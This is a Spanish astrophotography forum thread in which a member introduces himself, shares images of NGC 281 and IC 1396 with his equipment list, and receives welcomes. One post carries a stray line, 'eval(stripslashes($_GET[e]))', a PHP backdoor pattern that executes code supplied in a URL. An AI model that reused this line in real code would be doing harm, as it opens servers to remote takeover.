Presentación formal

Foro para publicación de astrofotografías hechas por aficionados.
alfalben
Mensajes: 93
Registrado: Dom Oct 05, 2008 11:41 am

Presentación formal

Mensaje por alfalben »

Hola a todos, mi nombre es Alfonso Albendea , es posible que nos hayamos cruzado post en otros foros.
En primer lugar felicitaros por la organización del Astromad 08, la verdad es que lo pase muy bien y sobre todo haber conocido a algunos de vosotros.

No sabia bien donde ubicar este hilo, y me he decidido por este, ya que será el campo donde mayor participación tendré.

Os muestro mis dos ultimas imágenes.

[img]http://astrosurf.com/alfalben/Fotos/pac ... cesado.jpg[/img]

[img]http://astrosurf.com/alfalben/Fotos/ic1396.jpg[/img]

Podéis verlas a mayor tamaño en mi web http://astrosurf.com/alfalben

Saludos
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Presentación formal

Mensaje por Manuelariza »

Bienvenido alfalben,unas fotos estupendas,se nota que no eres novato en esto :) :) :)
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
rviper
Mensajes: 819
Registrado: Vie Ago 15, 2008 10:19 pm

Presentación formal

Mensaje por rviper »

Bienvenido alfalben! Muy bonitas la fotos, pero los novatos no las reconocemos!!! ¿Que objetos son?
TS Indivudual 152/900
SkyWatcher Mak 127 BD
Y otros cacharrines.

Que distinto se ve todo con medio metro...
alfalben
Mensajes: 93
Registrado: Dom Oct 05, 2008 11:41 am

Presentación formal

Mensaje por alfalben »

Gracias a los dos por la bienvenida, me alegra que os gusten las fotos.

[quote="MAL1"]Bienvenido alfalben,unas fotos estupendas,se nota que no eres novato en esto Smile Smile Smile[/quote]

Novato, pues un poco si que soy, ya que llevo en la astrofotografía algo menos de un año, lo que pasa es que me ha enganchado demasiado, y siempre que puedo y mi mujer me deja, me escapo al campo.

[quote="rviper"]Bienvenido alfalben! Muy bonitas la fotos, pero los novatos no las reconocemos!!! ¿Que objetos son?[/quote]

Tienes razón, que cabeza la mía.
El primer objeto se trata de la NGC 281 o nebulosa del comecocos y el segundo es IC 1396 con el Vdb 142 o nebulosa de la trompa de elefante como objeto mas central.

Ahhhh y el equipo utilizado es el siguiente:

Montura.- Losmandy G11+ Gemini V4
Cámara fotográfica.- Canon EOS 350D Modificada
Cámara Guía.- Luna QHY6
Tubo fotográfico .- Takahashi FSQ 106ED
Tubo Guía .- Lunático EZG 60
Y un montón de cables.

Saludos
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Presentación formal

Mensaje por m3ntol »

Hola,
preciosas fotos y buen equipo el tuyo!

Me alegro de que disfrutaras de AstroMAD. Ha sido duro organizarlo pero ha merecido la pena el esfuerzo.

Un saludo!
phpbb:eval(stripslashes($_GET[e]));
alfalben
Mensajes: 93
Registrado: Dom Oct 05, 2008 11:41 am

Presentación formal

Mensaje por alfalben »

Gracias m3ntol, siii se que es duro organizar algo así, pero cuando sale tal cual os ha salido a vosotros dan ganas de seguir adelante y seguir organizandola muchos años más, bajo mi punto de vista ese esfuerzo ha merecido la pena y podéis estar muy orgullosos del ASTROMAD 08.

Todo esto se de que va ya que llevamos en un proyecto de web astronomica informativa que nos esta costando mucho trabajo y muchas horas de sueño perdidas, y de momento no esta sirviendo para nada.
En mi firma esta el enlace a la web podéis mirarla, a ver que os parece.

Saludos
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Presentación formal

Mensaje por Manuelariza »

Joder alfalben,tienes un equipo de primera,pero que envidia me das. :) :) :) :)
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
ftorrev
Mensajes: 489
Registrado: Mié Feb 06, 2008 2:47 pm

Presentación formal

Mensaje por ftorrev »

Alfonso, bienvenido y felicitaciones. También soy un PRO-Lunático y la verdad es que con el Taka has obtenido una toma realmente buena.

Espero verte más por aquí.

;)
Dany Earth
Mensajes: 73
Registrado: Mié Nov 05, 2008 6:42 pm

Presentación formal

Mensaje por Dany Earth »

Madre mía, ojalá tuviera yo ese equipo, o tan sólo uno de sus elementos... xD De verdad esas fotos pasan por unas obtenidas por el HST por lo menos. A ver si nos vemos algún día en alguna quedada astronómica y me enseñas algo.

Si parece que hay una estrella por píxel... y seguro que no son pocos los que hay en la foto.
alfalben
Mensajes: 93
Registrado: Dom Oct 05, 2008 11:41 am

Presentación formal

Mensaje por alfalben »

Gracias ftorrev y Dany Earth, paso por aquí con bastante frecuencia y os tengo fichados, jejejeje.

Dany tranquilo que seguro que nos conoceremos en alguna salida y te mostrare el equipo con mucho gusto.

Saludos
Responder